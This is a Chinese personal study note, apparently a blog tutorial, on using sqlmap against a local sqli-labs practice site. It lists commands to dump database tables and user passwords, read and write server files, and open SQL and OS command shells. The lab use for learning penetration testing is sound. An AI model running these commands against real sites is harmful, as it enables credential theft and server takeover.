sqlmap 基本使用教程--个人笔记
一、sqlmap获取目标方式
1、指定目标url
sqlmap -u http://www.sqllab.com/Less-5/?id=1
2、从文件中获取多个url
sqlmap -m test.txt
3、从文件中加载HTTP请求
sqlmap -r url.txt
4、从burp日志中获取目标
sqlmap -l burp.txt
二、sqlmap测试命令举例:
-batch: 自动答复和判断,默认输入 Y 来进行下一步操作。
-dump:拖库命令。
网站使用GET请求方式
1、查看数据库名
sqlmap -u http://www.sqllab.com/Less-5/?id=1 -dbs -batch
2、查看 security 数据库中的表名
sqlmap -u http://www.sqllab.com/Less-5/?id=1 -D security -tables -batch
3、查看 security 数据库中 users 表中的字段名
sqlmap -u http://www.sqllab.com/Less-5/?id=1 -D security -T users -columns -batch
4、查看 security 数据库中 users 表中的所有数据信息
sqlmap -u http://www.sqllab.com/Less-5/?id=1 -D security -T users -C id,username,password -dump -batch
网站使用POST请求方式
1、查看数据库名
sqlmap -u http://www.sqllab.com/Less-15/ -data="uname=1&passwd=1&submit=Submit" -dbs -batch
2、查看 security 数据库中的表名
sqlmap -u http://www.sqllab.com/Less-15/ -data="uname=1&passwd=1&submit=Submit" -D security -tables -batch
3、查看 security 数据库中 users 表中的字段名
sqlmap -u http://www.sqllab.com/Less-15/ -data="uname=1&passwd=1&submit=Submit" -D security -T users -columns -batch
4、查看 security 数据库中 users 表中的所有数据信息
sqlmap -u http://www.sqllab.com/Less-15/ -data="uname=1&passwd=1&submit=Submit" -D security -T users -C id,username,password -dump -batch
用户权限
1、列出数据库管理系统用户
sqlmap -u http://www.sqllab.com/Less-5/?id=1 -users
2、查看当前连接数据库用户
sqlmap -u http://www.sqllab.com/Less-5/?id=1 -current-user
3、查看数据库用户所有密码
sqlmap -u http://www.sqllab.com/Less-5/?id=1 -passwords
4、判断当前用户是否是DBA
sqlmap -u http://www.sqllab.com/Less-5/?id=1 --is-dba
5、查看用户权限
sqlmap -u http://www.sqllab.com/Less-5/?id=1 -privileges
文件操作与shell提权
1、sql shell
直接获取一个sql shell,直接执行 sql 语句进行交互。
sqlmap -u http://www.sqllab.com/Less-5/?id=1 -sql-shell
2、cmd shell
直接获取一个cmd shell,直接执行cmd命令进行交互。
sqlmap -u http://www.sqllab.com/Less-5/?id=1 --os-shell
3、读取服务器上指定文件
sqlmap -u http://www.sqllab.com/Less-5/?id=1 --file-read=C:/1.txt
4、写入本地文件到服务器上
注意:1、必须为dba权限;2、与 sqli-labs Less-7 原理相似
sqlmap -u http://www.sqllab.com/Less-5/?id=1 --file-write 1.txt --file-dest C:/phpstudy_pro/WWW/sqllab/1.txt